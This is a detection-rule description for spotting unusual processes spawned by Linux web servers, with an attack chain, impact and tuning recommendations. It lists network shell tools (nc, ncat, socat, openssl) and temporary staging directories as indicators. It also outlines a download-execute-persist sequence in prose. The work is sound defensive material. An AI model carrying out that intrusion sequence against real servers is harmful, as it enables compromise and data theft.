Unusual Process Spawned from Web Server Parent

This detection rule identifies low-frequency process spawning activity from web server parent processes on Linux systems. The rule focuses on detecting unusual user IDs, directories, and process counts, which may indicate potential attacker activity, such as establishing persistence, executing malicious commands, or establishing command and control channels on the host system. The rule analyzes process execution events and identifies processes like shells, scripting interpreters (Python, PHP, Perl, Ruby, Lua), and networking tools (socat, openssl, nc, ncat) spawned from web server processes. This activity is considered suspicious when it occurs infrequently and originates from locations like /tmp, /var/tmp, or /dev/shm. This detection helps defenders identify potential compromises of web servers and subsequent malicious actions.

Attack Chain

1. An attacker gains initial access to a web server through a vulnerability (e.g., file upload, remote code execution).
2. The attacker leverages the web server process (e.g., Apache, Nginx) to execute a command.
3. The web server process spawns a shell (e.g., bash, sh) or scripting interpreter (e.g., python, php).
4. The spawned shell or script is used to download a malicious payload from a remote server using tools like curl or wget.
5. The downloaded payload is saved to a temporary directory such as /tmp or /var/tmp.
6. The attacker executes the downloaded payload.
7. The executed payload establishes persistence using techniques such as cron jobs or systemd services.
8. The attacker uses the compromised system to establish command and control channels or perform lateral movement.

Impact

A successful attack can lead to the compromise of the web server and potentially other systems on the network. Attackers may gain access to sensitive data, disrupt services, or use the compromised system to launch further attacks. This can result in data breaches, financial losses, and reputational damage. Due to the low severity rating of this alert, the impact would most likely be potential access and a lower chance of a complete breach of the system.

Recommendation

• Enable Elastic Defend and configure the integration to monitor process execution events on Linux systems, as this rule requires Elastic Defend data.
• Deploy the Sigma rule “Detect Suspicious Web Server Child Processes” to your SIEM and tune for your environment.
• Investigate any alerts generated by this rule, focusing on unusual process names, command-line arguments, and working directories.
• Review the parent process executable to ensure it is a legitimate web server executable.
• Consider adding exceptions for legitimate processes that may be spawned by the web server.